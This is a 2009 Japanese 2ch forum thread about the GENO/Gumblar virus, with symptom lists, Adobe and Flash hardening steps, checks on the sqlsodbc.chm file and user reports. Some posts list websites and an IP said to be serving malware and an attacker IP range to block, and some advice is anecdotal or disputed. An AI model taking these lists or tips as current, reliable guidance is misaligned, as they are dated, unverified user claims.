GENOウイルススレ ★5

このエントリーをはてなブックマークに追加
1名無しさん@お腹いっぱい。
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD

感染が疑わしい人は迷わずクリーンインストール推奨です。
★Anubisレポート
ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html

★GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/
★このサイトは諸事情により内容を書き換え
ttp://www3.atword.jp/gnome/

★過去スレ
GENOウイルススレ ★4
http://pc11.2ch.net/test/read.cgi/sec/1242363241/
GENOウイルススレ ★3
http://pc11.2ch.net/test/read.cgi/sec/1240853183/
GENOウイルススレ ★2
http://pc11.2ch.net/test/read.cgi/sec/1239364066/
GENOウイルススレ
http://pc11.2ch.net/test/read.cgi/sec/1239152979/
2名無しさん@お腹いっぱい。:2009/05/16(土) 04:17:42
感染予防対策

1.Adobe Flash Player の最新版にアップデート
2.Adobe Acrobat Reader の最新版にアップデート
3.NoScriptの導入(Firefoxの導入)
4.Adobe Acrobat Readerの JavaScript 機能OFF
5.危険IPのブロック


諸事情でAdobe Reader 最新版を使わざるを得ない場合
2009年4月29日現在の最新版バージョン9.1設定例

1.Adobe Readerを起動し「編集」メニューの「環境設定」
  「Acrobat JavaScriptを使用」のチェックボックスをオフ(チェックを外す)
  OKを押して設定確定後、Adobe Readerを終了。

2.必要と好みに応じて Adobe Reader Speed-Up にてプラグインを整理
  設定は SpeedUp - Fast がおすすめ。
   注意すべきは
   Acroform(拡張子なし)
   Annotations(拡張子なし)
   これら2つのチェックボックスをオン(チェックが入っている)状態にしておく必要がある。
   そうしないと Adobe Reader が起動しなかったりする。

   このとき追加作業として
   EScript.apiとEScript.JPNのチェックボックスをオフ(チェックを外す)状態にしておくと
   より安心かもしれない。

以下はお約束
上に書いたことを行えば安全という保証はなく、すべて自己責任でお願いします。
またAdobe Reader以外の環境設定をどうするかも各自考える必要があります。
3名無しさん@お腹いっぱい。:2009/05/16(土) 04:18:27
以下攻撃されたサイト
小林製薬
ttp://www.kobayashi.co.jp/info/090512.html

国内の正規サイト改ざん:攻撃サイトを変え再襲来
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1884


★感染を疑った人の報告
【OS】
【使用セキュリティソフト】
【疑った理由】
【症状】
【確認手段】
【結果】
4名無しさん@お腹いっぱい。:2009/05/16(土) 04:19:53
現在拡散している Gumblar.cn
zlkonの亜種ですが以下のような特徴を持っています。

インジェクションコードが難解になった
バージョンチェックをユーザ側で行うため、サーバスクリプトの検出を回避している
 ※一部のIDSはサーバスクリプトへのクエリを監視しており、クライアント側でやられても判断できない
感染が容易と思われるPC環境をよりピンポイントに判断している(このため、セキュ各社の自動検出が難しくなっている)
感染しない環境には何も返さない(更に検証が難しい)
亜種の「更新」の頻度が異常にすばやく、亜種がほとんどのセキュソフトを潜り抜けているので、シグネーチャ・ベースでの検出が難しい
 ※検出率が上がる頃には次の種類になっている

感染の疑いがある場合
XP / 2000 の方は sqlsodbc.chm をチェックしてください。
※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
ttp://www3.atword.jp/gnome/zlkon-gumblar-%E5%95%8F%E9%A1%8C%E3%81%AB%E9%96%A2%E3%81%97%E3%81%A6/
5名無しさん@お腹いっぱい。:2009/05/16(土) 04:24:44
次スレいらないね
6名無しさん@お腹いっぱい。:2009/05/16(土) 04:24:44
正常なsqlsodbc.chm
ファイルサイズ:50,727バイト
CRC32:B61C7A80
MD5:F639AFDE02547603A3D3930EE4BF8C12
SHA-1:FBDD32ED13D27E4102621E1067FDF3634F33B2C3
7名無しさん@お腹いっぱい。:2009/05/16(土) 04:25:50
【感染の確認方法】
@cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する
 ※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
 ■確認方法
 1.スタートから「ファイル名を指定して実行」
 2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
   「regedit.exe」と入力して「OK」ボタンを押す。
   ※立ち上がったことを確認したら弄らず閉じること。
 3.同様に、「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
   ※立ち上がったことを確認したらAへ

Asqlsodbc.chmのファイルサイズの確認を確認する
 ■Windows XP:
  改ざんされていなければ
  C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
 ■Windows 2000:
  そもそも存在しないはずなので、
  C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
 ■確認方法
  1.スタートから「ファイル名を指定して実行」
  2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
  「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
   →背景が黒いウィンドウが開いた場合3へ
   →起動しない場合:感染疑い濃厚
  3.背景が黒いウィンドウを選択。
   小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー

Bavast!(無料のアンチウイルスソフト)で確認
8名無しさん@お腹いっぱい。:2009/05/16(土) 04:27:35
Flash Player はブラウザごとに最新であることを確認してください。
IEで最新でもFirefoxは古いままだったり、その逆もあります。
9名無しさん@お腹いっぱい。:2009/05/16(土) 04:30:51
初心者や質問がある方は
http://changi.2ch.net/test/read.cgi/doujin/1242391122/
上記のスレに行くと優しく教えてくれるかもです
10名無しさん@お腹いっぱい。:2009/05/16(土) 04:32:21
          /)             
           ///)      
          /,.=゙''"/           
   /     i f ,.r='"-‐'つ____   キャッシュ消しゃーいいんだよ!
  /      /   _,.-‐'~/⌒  ⌒\
    /   ,i   ,二ニ⊃( ●). (●)\
   /    ノ    il゙フ::::::⌒(__人__)⌒::::: \
      ,イ「ト、  ,!,!|     |r┬-|     |
     / iトヾヽ_/ィ"\      `ー'´     /
11名無しさん@お腹いっぱい。:2009/05/16(土) 04:34:11
確実な対策が出るまでネットはやめた方がいいってことですか?
12名無しさん@お腹いっぱい。:2009/05/16(土) 04:35:43
でもネット繋がないと最新の対策を知れないというジレンマ
13名無しさん@お腹いっぱい。:2009/05/16(土) 04:36:50
>こっちは、初心者や質問 お断りのテンプレ専用スレにはできないものか?
14名無しさん@お腹いっぱい。:2009/05/16(土) 04:37:32
Adobe Flash Player バージョンテスト
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
15名無しさん@お腹いっぱい。:2009/05/16(土) 04:38:21
とりあえず対策とりつつ
余計なサイトを見に行かないようにしていればいいじゃないのかえ
16名無しさん@お腹いっぱい。:2009/05/16(土) 04:38:38
avastって結構早めに対応してたっぽいね
今のカスペル試し終わったらつかおっかな?
あヴぃら・・・にはがっくりだよ
17名無しさん@お腹いっぱい。:2009/05/16(土) 04:39:04
ところで前スレの痛いニュースの俺はどちらのスレも立てていない件について
まあどうでもいいんだけどな
18名無しさん@お腹いっぱい。:2009/05/16(土) 04:39:43
人減ってきたけどまた昼になれば増えそうな予感
19名無しさん@お腹いっぱい。:2009/05/16(土) 04:39:43
ノートン先生機嫌切れで買おうかと思ってたけどもうアバストでいいわ
20名無しさん@お腹いっぱい。:2009/05/16(土) 04:40:28
1〜2スレまでまったりしてたのに
なんで急に加速しだしたんだ?
21名無しさん@お腹いっぱい。:2009/05/16(土) 04:40:39
これってサイト持ちじゃなければあんまり関係ないかと思っていたら
クレカ情報も抜かれるの?
>>1だと重大性があんまりわからないね
22名無しさん@お腹いっぱい。:2009/05/16(土) 04:41:19
>>21
次のスレにでも危ないってことテンプレに入れよう
23名無しさん@お腹いっぱい。:2009/05/16(土) 04:42:38
>>20
隠蔽の成果で順調に感染拡大したんだろ
24名無しさん@お腹いっぱい。:2009/05/16(土) 04:43:05
avast
感染サイト開くと警告
そのまま言う事聞けば感染しない

だけどそのサイトよく行ってるから誤検出かと思った
あざといぞこのウィルス
25名無しさん@お腹いっぱい。:2009/05/16(土) 04:43:22
>>20
同人板の人達がなだれ込んできたから。
26名無しさん@お腹いっぱい。:2009/05/16(土) 04:45:36
つい一昨日くらいまでavastでトロイ警告出してたサイトが今行ったらうんともすんともいわない
管理人対策してないっぽいのにどうしたんだろ
27名無しさん@お腹いっぱい。:2009/05/16(土) 04:45:37
VirtualPC + LINUX でネットしてれば大丈夫?
28名無しさん@お腹いっぱい。:2009/05/16(土) 04:46:46
>>26
こっちもそういうサイト見つけた
どういうことだろう
29名無しさん@お腹いっぱい。:2009/05/16(土) 04:46:48
一度感染したPCは
他人に乗っ取られているのと同じ
WindowsUpdateの変わりにウィルスを
いつでも最新の状態に更新してくれます
30名無しさん@お腹いっぱい。:2009/05/16(土) 04:47:08
もう2chしか見ない
31名無しさん@お腹いっぱい。:2009/05/16(土) 04:47:35
523 :名無しさん@お腹いっぱい。 [↓] :2009/05/16(土) 00:47:48
>>1のサイトがいつなくなるかもわからないので、
現在感染中のサイトを転載しておく

p-frying■com/
www■zengozen■co■jp/
www■beauty-wed■co■jp/
skyhighpremium■com/
sound■jp/yudai_marimba/
www■thesis-report■com/
www■joyjoynet■com/
www■ti-a-ra■com/
www1■odn■ne■jp/revue1999/
www■nifty-hair■com/
32名無しさん@お腹いっぱい。:2009/05/16(土) 04:48:04
>>20
セキュ板的には4月上旬が旬のスレで段々過疎って来てたのが
ついこの間動画サイトSayMove!が感染してから
また人が増えたって感じだな
33名無しさん@お腹いっぱい。:2009/05/16(土) 04:48:55
俺はインフルのニュー速+かなんかのスレから着たわ
インフルエンザよりこっちのがよっぽど怖い
34名無しさん@お腹いっぱい。:2009/05/16(土) 04:49:16
>>27
VirtualPCってことは、ホストOSはWindowsだよね?

35名無しさん@お腹いっぱい。:2009/05/16(土) 04:49:50
こういうのいつまで我慢すればいいんだ
36名無しさん@お腹いっぱい。:2009/05/16(土) 04:49:50
GENOの対応の悪さったらないね
37名無しさん@お腹いっぱい。:2009/05/16(土) 04:50:37
Flash Playerの最新版をDLしてインスコしようとすると、

「申し訳ありません。googleツールバーをインストールできません。
>再試行 >キャンセル」

って出てきて何度も再試行したり最初からDLしてやり直してもインスコ出来ません。
何が原因でしょうか…
38名無しさん@お腹いっぱい。:2009/05/16(土) 04:54:42
\Drivers32
に.acmとか.axで設定されてるファイルがあるんだけど・・・
感染してるのかな
39名無しさん@お腹いっぱい。:2009/05/16(土) 04:55:33
>>37
グーグルツールバーなんてでるっけ?
40名無しさん@お腹いっぱい。:2009/05/16(土) 04:59:18

  ■GENOウイルス無料配布キャンペーン■

      ★延長のお知らせ★
41名無しさん@お腹いっぱい。:2009/05/16(土) 04:59:50
426 :【5月16日3時時点での同人サイト感染状況】 [↓] :2009/05/16(土) 03:12:03 ID:NMcHxmSp0
1.エヴァ(小説サーチ)
2.ヘタリア(同人サイト)
3.テニミュ(同人サイト及びファンサイト)
4.戦国BASARA(同人サイト)
5.リボーン(プチオンリーサイト及びファンサイト)
6.おお振り(アンソロサイト)
7.ジョジョの奇妙な冒険(同人サイト)
8.バイオハザード(同人サイト)
9.戦国無双(同人サイト)
10.メガテン(同人サイト)
11.乙女ゲームのVitamin(同人サイト)
12.鋼の錬金術師(同人サイト)
13.ガンダム00(同人サイト)
14.幻想水滸伝(同人サイト)
15.忍たま乱太郎(同人サイト)
16.遙かなる時空の中で(同人サイト)
17.Fate(同人サイト)
42名無しさん@お腹いっぱい。:2009/05/16(土) 05:00:16
Adobe Flash Playerのインストール
Adobe Flash Playerのバージョン 10.0.22.87
43名無しさん@お腹いっぱい。:2009/05/16(土) 05:00:18
今北。 なにこれこわい。
マカーは関係ないの?
俺のHPが感染しないようにするにはどうしたらいいんだ。
44名無しさん@お腹いっぱい。:2009/05/16(土) 05:01:16
>>43

495 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 00:33:38
>>491
JavaScriptは動いてもMac上ではexeが勝手に動かないから大丈夫だよ
45名無しさん@お腹いっぱい。:2009/05/16(土) 05:03:44
先ほどの>>37ですがすみません、自己解決しました

googleツールバーを最新にしてから改めてFlash Playerをインストールしたところ
正常にインストールされました。
46名無しさん@お腹いっぱい。:2009/05/16(土) 05:03:57
急に加速してるからビビったw
そんなに広まってるってことかよ・・
2ちゃんが一番安全だなんてw
47名無しさん@お腹いっぱい。:2009/05/16(土) 05:04:51
感染後クリーンインストールするとして
WEBに関係ない画像やテキストなどのデータはバックアップとっても大丈夫でしょうか?
48名無しさん@お腹いっぱい。:2009/05/16(土) 05:06:05
>>41
同人板のスレ見てたら
東方
サンレッド
ブレイブルー
コードギアス

も報告来てたよ
4943:2009/05/16(土) 05:06:25
>>44
ありがとう。
それにしても恐ろしいな。友達に言っとかないと…
50名無しさん@お腹いっぱい。:2009/05/16(土) 05:06:47
感染してた人いないです?
話がききたい
51名無しさん@お腹いっぱい。:2009/05/16(土) 05:08:12
>>24
あのさ、avastで開こうとしたら警告出るでしょ?
で、すぐにIE閉じた場合、チェストに移動できる?

俺、ウイルスチェストに移動できなくてエラーになったことあるんだが、
この場合、感染してしまったのかな?

ただ、TempInternetFileの中身を全削除してから、全ドライブを
avastでチェックかけたところ、ウイルスは出なかった
regeditも正常に起動できた

ウイルスに感染したページを開く前に、avastが警告出して
未然防止できたってことで良いのかな?
ただ、何でチェストに移動できなかったのかが謎だけど・・・
すぐにIE閉じたから?
52名無しさん@お腹いっぱい。:2009/05/16(土) 05:08:19
>>50
前スレ見ろ。
53名無しさん@お腹いっぱい。:2009/05/16(土) 05:08:27
>>49
自分もすぐ家族とPCに疎い友達に言ったよ
最初はふーんて感じだったけど
小林製薬の事はなしたら「気をつける」ってさ
54名無しさん@お腹いっぱい。:2009/05/16(土) 05:09:00
sqlsodbc
サイズ 49.5 KB (50,727 バイト)
ディスク上のサイズ 52.0 KB (53,248 バイト)

これって( )内の数字が正しいから大丈夫だよね?
55名無しさん@お腹いっぱい。:2009/05/16(土) 05:11:13
>>51
自分の場合は「そのまま閉じなさい」みたいに言われたから閉じるボタン押したよ
いつもだったらチェストに移動とか出るけどその時は「閉じる」一択だったわ
多分大丈夫
こちらもウィルスチェックしたけど何も出なかった
56名無しさん@お腹いっぱい。:2009/05/16(土) 05:13:01
PC疎い人が「気をつける」って
何を気をつけるんだろうな…
ウィルスに感染してるサイトは特別な状態になってるとか
思ってそうだ
57名無しさん@お腹いっぱい。:2009/05/16(土) 05:13:46
>>55
あれ、「チェストに移動する(推奨)」とか出なかった?
通常は、「削除」「チェストに移動」のどっちか選べるよね?

あまりに危険だから、チェストに移動できないタイプだったのかな?
58名無しさん@お腹いっぱい。:2009/05/16(土) 05:15:33
>>54
md5で確認したファイルとサイズは同じだね
気になるならmd5見たほうがいいんじゃないかな
59名無しさん@お腹いっぱい。:2009/05/16(土) 05:18:08
>>57
うん。普通のタイプのウィルスだったら「チェストに移動」が出るんだけど
今回のは出なかったよ
こういう事あるんだなー
60名無しさん@お腹いっぱい。:2009/05/16(土) 05:19:27
>>59
俺の場合、「チェストに移動」って出てきたよ
だけど、クリックしたのに「エラー」になって移動できなかった
61名無しさん@お腹いっぱい。:2009/05/16(土) 05:20:44
>>56
まぁウィルスという言葉が片隅にあるのとないのじゃ対策の仕方も変わるしいいんでないの
62名無しさん@お腹いっぱい。:2009/05/16(土) 05:22:23
とりあえずはavastさんがどうにかしてくれてるわけね
63名無しさん@お腹いっぱい。:2009/05/16(土) 05:22:44
cmd.exeで実行してdir C:\WINDOWS\system32\sqlsodbc.chmでエンター押したら
ファイルが見つかりませんって出たんだけどこれはアウト?
さっきまで1個のファイル 50,727バイトって表示されてたんだけど、
まとめサイトにのってるニフティのサイト開いてKasperskyもダウンロードしたあと試したらこうなった
64名無しさん@お腹いっぱい。:2009/05/16(土) 05:22:47
>>47
断言は出来ない
出来ないけどたぶん大丈夫じゃね?
このウイルスは今のところCドライブのシステム関連を改変するだけっぽいので
それ以外の場所のテキストファイルや画像・動画ファイルとかはたぶん問題ないと思う
たぶんね(責任は持てないけど)
65名無しさん@お腹いっぱい。:2009/05/16(土) 05:24:14
>>63
それ開けてる
66名無しさん@お腹いっぱい。:2009/05/16(土) 05:24:27
>>63
普通にエクスプローラで見てみれば?
67名無しさん@お腹いっぱい。:2009/05/16(土) 05:26:08
今日寝ずにオンラインスキャンしたりブラウザの設定したよ...
68名無しさん@お腹いっぱい。:2009/05/16(土) 05:26:44
>>63
キャッシュ削除すればおkってゲロさんが言ってた
69名無しさん@お腹いっぱい。:2009/05/16(土) 05:27:59
キャッシュ消してもウィルスが消えるわけじゃないんですよね、社員さん
70名無しさん@お腹いっぱい。:2009/05/16(土) 05:28:55
ゲロさんの言うキャッシュ削除は役に立たないってまとめwikiにあったが
71名無しさん@お腹いっぱい。:2009/05/16(土) 05:29:16
>>38
そっちのファイルが何かわからないけど
こっちも調べたら.acmや.axがあったわ・・・・
けど、ググてみたら普通にレジストリにあるぽいんだよね・・・・
どうなんだろう
72名無しさん@お腹いっぱい。:2009/05/16(土) 05:30:24
>>65>>66
開けてるけど1個のファイル 50,727バイトって出ないとアウトなんじゃないの
でもsqlsodbc.chmプロパティ開いてみたら50,727バイトなってた。
これはセーフなのかアウトなのか・・・
73名無しさん@お腹いっぱい。:2009/05/16(土) 05:33:20
さっきまで女とヤりまくってたんだけど
実はウイルスのことで頭がいっぱいだったんだ。

この外国帰りの女。まさか豚ウイルス持ち帰ってねーだろな。
ってな。
74名無しさん@お腹いっぱい。:2009/05/16(土) 05:34:02
>>72
カスペでウィルスチェックしたの?
全部
75名無しさん@お腹いっぱい。:2009/05/16(土) 05:34:33
GENOってノートンで[94.247.2.0]-[94.247.3.255]を遮断してれば大丈夫?
その他の対策もやっといた方がいいんでしょうか
76名無しさん@お腹いっぱい。:2009/05/16(土) 05:34:51
システムフォルダがWINDOWSじゃないとか
システムドライブがC:じゃないとか
77名無しさん@お腹いっぱい。:2009/05/16(土) 05:35:44
>>72
お前はもうアウトだと思ってネット切っとけ…
78名無しさん@お腹いっぱい。:2009/05/16(土) 05:38:00
>>74
カスパーインストールしようとすると「インストールノログを開くときにエラーが発生しました。
指定されたファイルの場所が存在し、書き込み可能であることを確認してください」って出てしまう
79名無しさん@お腹いっぱい。:2009/05/16(土) 05:41:08
vipとかも蔓延してそうだな
80名無しさん@お腹いっぱい。:2009/05/16(土) 05:41:47
>>78
まずウィルスチェックしてください
他のウィルス対策ソフトやオンラインスキャンが使えないならパソコン綺麗にしたほうが早いですね
81名無しさん@お腹いっぱい。:2009/05/16(土) 05:46:46
Adobe Acrobat Reader自体ダウンロードしてなかったら大丈夫?
それとも対策として入れておいたほうがいい?
82名無しさん@お腹いっぱい。:2009/05/16(土) 05:47:33
>>81
使わないなら入れなくていい
83名無しさん@お腹いっぱい。:2009/05/16(土) 05:53:43
Java script を切ったり、各種ソフトウェアを
更新していれば、万が一書き換えが起きてるサイトを
踏んでも一応大丈夫だと思ってたんだけど
ここ数日で何か変わったのか?
84名無しさん@お腹いっぱい。:2009/05/16(土) 05:57:29
>>83
亜種が出てきてるから何を信じればいいのかわからない状態
85名無しさん@お腹いっぱい。:2009/05/16(土) 06:00:04
>>3
★感染を疑った人の報告
【OS】
【使用セキュリティソフト】
【疑った理由】
【症状】
【確認手段】
【結果】

86名無しさん@お腹いっぱい。:2009/05/16(土) 06:00:53
javaスクリプトは切ったんだけど、それでも一応
javaスクリプト最新版にアップデートしておいた方が良い?
87名無しさん@お腹いっぱい。:2009/05/16(土) 06:01:58
……「同人サイト」ってなに?
エロサイト?

88名無しさん@お腹いっぱい。:2009/05/16(土) 06:03:03
うぁあああああああああああああああああああああああああああああああああああああああああああ


ああああああああああ・・・・・・あああああああああ・・・・・あああああああああああ


ぁぁぁぁぁぁ・・・・・・
8964:2009/05/16(土) 06:03:04
まとめwikiのdir C:\WINDOWS\system32\sqlsodbc.chmをコピってエンターだとファイルが表示されませんて出たけど
コピペのdir C:\WINDOWS\system32\sqlsodbc.chmだと1個のファイル 50,727バイトってちゃんと出た。
何が違ったのかよくわからないけど一応報告
90名無しさん@お腹いっぱい。:2009/05/16(土) 06:07:01
>>89
正常だけど
心配ならウィルスチェックしてみたらいいじゃないの
91名無しさん@お腹いっぱい。:2009/05/16(土) 06:11:49
普通のサイトにトラップだなんて困るわ
92名無しさん@お腹いっぱい。:2009/05/16(土) 06:17:46
このスレですら今の状態だからもう感染爆発は止められないな
ほとんどのメーカー製PCやソフトはマニュアルがPDFで
Acrobatが標準プリインストールされてしまっている
購入後アドビまで探しに行って更新するわけがないし
リカバリすればまた古いAcrobatが再インストールされる
自分のPCにAcrobatがあることすら知らないはず
93名無しさん@お腹いっぱい。:2009/05/16(土) 06:18:34
…げ、evalあった
放置してる上、趣向が趣向だけに
もう閲覧してる人もいないようなサイトだから
ゆっくり考えてから行動するか…
他のサイトは無事で、最優先でチェックした項目に
感染の形跡無いのは何でだろ、亜種かな
94名無しさん@お腹いっぱい。:2009/05/16(土) 06:27:03
>>47
本当に必要なファイルはVirusTotalにかけて、
それ以外の99パーセントのファイルは、一応スキャンした後で、外付けHDDとかに退避がおすすめ。
そしてしばらく凍結。

今は完全に 悪意の攻撃者 >>>>>>>>>>>>>>>>>>>>>>>セキュリティーベンダー
だから、1ヶ月(いや、最悪半年か?)くらい、不要ファイルは寝かせて、
セキュリティーベンダーのウィルス特定精度があがってきた頃に、外付けHDDの中を再スキャン。
その時は、マカフィー、ノートン、G-Data Kaspersky など複数ソフトで検索した方がいいよ。

>>57
なんかほのぼのしているね。
avast使ってないから、なんとも言えんけど、ローカルじゃなくて、ウェブとの通信で見つけたから、
わざわざローカルに保存してチェストに移動する必要がなかったのでは?
>>75
今、凶悪なのが、そこってだけで、前は違ったみたいよ。 だから十中八九また変わる。
95名無しさん@お腹いっぱい。:2009/05/16(土) 06:27:14
まずウイルスチェックしようよ
96名無しさん@お腹いっぱい。:2009/05/16(土) 06:28:00
ソロだとMeteorb楽なんだけど
マルチだと火力きついんだよね
∞ないと雷は乙ってるし、氷じゃソロ辛そうだしムズイ
97名無しさん@お腹いっぱい。:2009/05/16(土) 06:28:42
おはよおー
前スレ終わるのはえーなw
てきとーに読んでみるか
98名無しさん@お腹いっぱい。:2009/05/16(土) 06:28:47
なんという誤爆
99名無しさん@お腹いっぱい。:2009/05/16(土) 06:29:09
なんかのRPG?
100名無しさん@お腹いっぱい。:2009/05/16(土) 06:30:00
>>97
同人板とやらとこのスレを行き来してる人が多かったから
かなり盛り上がってたみたい
10194:2009/05/16(土) 06:32:32
>>86
FlashとかadobeReaderとか
http://www.java.com/ja/download/installed.jsp
じゃなくて?

全てアンインストールするか最新じゃないと、脆弱性あるままだよ。
つまり、Javaスクリプトを切って、たとえ、このウィルスには大丈夫でも、
他のウィルスがスタンバイしている状態。
102名無しさん@お腹いっぱい。:2009/05/16(土) 06:33:06
>>97
スレの勢いスゴすぎだよねw
俺も寝る前新スレとして登録したはずなのに、起きたら旧スレになっててワロタ
でもやっとそれだけの人が集まってきたってことなんだろうけど
103名無しさん@お腹いっぱい。:2009/05/16(土) 06:33:32
女性同人はブログで満足せずサイト持ちが多いから影響が大きい
104名無しさん@お腹いっぱい。:2009/05/16(土) 06:34:04
2ちゃん慣れしてるとこのウィルス本当に存在してんの?とか思ってしまう
だけど他のサイトに行って確認するのも怖いというチキン
105名無しさん@お腹いっぱい。:2009/05/16(土) 06:35:01
>>104
こっちは小林のメールマガジンでこのウィルス知ったクチ
その時期に見てなかったから感染しなかったけどね
106名無しさん@お腹いっぱい。:2009/05/16(土) 06:38:25
自分も>>54と同じだ
これって黒…?
107名無しさん@お腹いっぱい。:2009/05/16(土) 06:39:32
それだけで決めてしまうのではなくって
オンラインチェックだとかPC挙動の見つつ判断したほうがいい
108名無しさん@お腹いっぱい。:2009/05/16(土) 06:40:44
>>106
MD5でも比較した方がいい
109名無しさん@お腹いっぱい。:2009/05/16(土) 06:41:20
カスペのオンラインスキャンに拒否られる。
やる気ねーだろ。
110名無しさん@お腹いっぱい。:2009/05/16(土) 06:41:59
>>108
ごめん
MD5のやり方がわからん
111名無しさん@お腹いっぱい。:2009/05/16(土) 06:42:14
ググれ
112名無しさん@お腹いっぱい。:2009/05/16(土) 06:43:36
>>111
ググって変なサイトを見たら、また感染する危険があるだろw
ここで教えろw
113名無しさん@お腹いっぱい。:2009/05/16(土) 06:44:20
こういう人は同人のほうのスレ行った方が優しくしてもらえる
114名無しさん@お腹いっぱい。:2009/05/16(土) 06:44:45
MP5っと…
なんだ?ヘッケラーアンドコックって。
115名無しさん@お腹いっぱい。:2009/05/16(土) 06:45:18
>>110
HashCheckerで探しましょう
116名無しさん@お腹いっぱい。:2009/05/16(土) 06:47:24
http://ja.wikipedia.org/wiki/MD5

MD5(エムディーファイブ、Message Digest Algorithm 5)とは、与えられた入力に対して128ビットのハッシュ値を出力するハッシュ関数である。
1991年に開発されたMD5は、前身であるMD4の安全性を向上させたものである。開発者はMD4と同じく、MIT教授のロナルド・リベスト。
Linuxでは md5sum、FreeBSDでは md5 というコマンドが用意されており、これを用いてメッセージダイジェストを出力することが出来る。
出力されるメッセージダイジェストは、d41d8cd98f00b204e9800998ecf8427e (入力データ長が0バイトの場合)
の様に16進数の数字が並んだテキスト形式で出力され、これをフィンガプリント(指紋)やハッシュ値、あるいは単にMD5値と呼ぶ。
「MD5チェックサム」とも良く言われる。
117名無しさん@お腹いっぱい。:2009/05/16(土) 06:48:19
MD5は、電子署名を必要とするアプリケーション向けに開発された。RSAで署名を生成する際に、メッセージを直接対象として
署名を生成するのではなく、メッセージのハッシュ値を生成し、ハッシュ値に対して署名を生成する。
ファイルを転送する際にそのファイルが破損していないことを確認するためにも用いられる。配布する側は、
ファイル配布時にそのファイルのMD5ハッシュ値(いわゆるMD5チェックサム)も同時に配布する。受信したユーザは
手元でファイルのMD5値を計算して、配布者の提示したMD5値と一致することを確認すれば良い。このような目的に
CRCを用いることもあるが、CRCは標準が複数存在するため現在ではあまり見られない。
またファイルが改竄されていないことを証明するためにも用いられる。これにより、作成者以外による
トロイの木馬やコンピュータウイルスなどの混入を防ぐことが出来る。 しかしながら、この場合MD5値は手元で計算できるのだから、
改竄済みのファイルのMD5値が同梱されている可能性がある。従って、改竄の恐れがある場合には、
ファイルに同封されているMD5値と比較するのではなく、MD5値だけは何かしら信頼できる方法で配布者から入手する必要がある。
118名無しさん@お腹いっぱい。:2009/05/16(土) 06:49:00
FreeBSDはインストール可能なCDイメージと、それのMD5値を同時に配布している。
(MD5値の改変はないと仮定して)インストール可能なCDイメージが、途中で改変されていないことを確認してみる。
配布サイトから、ここでは 5.1-RELEASE-i386-miniinst.iso という最小構成のインストールイメージファイルと、
CHECKSUM.MD5 というMD5値(いわゆるMD5チェックサム)の書かれたテキストファイルをダウンロードする。
md5 コマンドを、イメージファイルに実行する。
localhost% md5 5.1-RELEASE-i386-miniinst.iso
MD5 (5.1-RELEASE-i386-miniinst.iso) = 646da9ae5d90e6b51b06ede01b9fed67
CHECKSUM.MD5の中身を確認し、一致していれば破損の可能性は低いことが分かる。
localhost% cat CHECKSUM.MD5
MD5 (5.1-RELEASE-i386-disc1.iso) = 3b6619cffb5f96e1acfa578badae372f
MD5 (5.1-RELEASE-i386-disc2.iso) = 2cfa746974210d68e96ee620bf842fb6
MD5 (5.1-RELEASE-i386-miniinst.iso) = 646da9ae5d90e6b51b06ede01b9fed67
119名無しさん@お腹いっぱい。:2009/05/16(土) 06:49:32
>>112
なにこいつw
120名無しさん@お腹いっぱい。:2009/05/16(土) 06:50:06
ブログやなんかで記事書いてもたいして読まれて無いし意味無いかな〜
121名無しさん@お腹いっぱい。:2009/05/16(土) 06:51:09

           ///)
          /,.=゙''"/
   /     i f ,.r='"-‐'つ____   同人サイトなんてどうでもいいんだよ!!
  /      /   _,.-‐'~/⌒  ⌒\
    /   ,i   ,二ニ⊃( ●). (●)\
   /    ノ    il゙フ ::::::⌒(__人__)⌒::::: \
      ,イ「ト、  ,!,!|     |r┬-|     |
     / iトヾヽ_/ィ"\      `ー'´     /
122名無しさん@お腹いっぱい。:2009/05/16(土) 06:51:38
そういやGW始まったばかりの頃にすげー重くなって
こりゃいかんとリカバリしたことあった
すごく軽くなって満足してたが今思えばウイルスに感染してたのか…
123名無しさん@お腹いっぱい。:2009/05/16(土) 06:53:31
>>121
社員さんいいかげんにしてくださいよ
124名無しさん@お腹いっぱい。:2009/05/16(土) 06:53:55
>>115
ありがとう
HASH CHECKER入れてみます
ネットつなげるの少し怖いなw
125名無しさん@お腹いっぱい。:2009/05/16(土) 06:54:09
メインストリーム落ちしたOS使ってないと感染しないのにすごい盛り上がりっぷりだな
126名無しさん@お腹いっぱい。:2009/05/16(土) 06:54:40
>>125
メインストリーム落ちしたOSって?
127名無しさん@お腹いっぱい。:2009/05/16(土) 06:54:45
128名無しさん@お腹いっぱい。:2009/05/16(土) 06:55:26
NTTコミュニケーションズさん
 120.29.185.234(VPS-TOKYO2)
今日も踏んでみたけど放置のままなんだなあ・・・
129名無しさん@お腹いっぱい。:2009/05/16(土) 06:55:46
>>116
Wikipediaの説明読んでも、全く理解できないんだが・・・
結局、MD5がGENOウイルスとどう関係しているの?
130名無しさん@お腹いっぱい。:2009/05/16(土) 06:57:22
>>128
これってどんなサイト?
131名無しさん@お腹いっぱい。:2009/05/16(土) 06:58:01
>>120
今日はすごいヒット数になるかもよ
まだ分かってないやつ多いと思う
132名無しさん@お腹いっぱい。:2009/05/16(土) 06:58:12
>>124
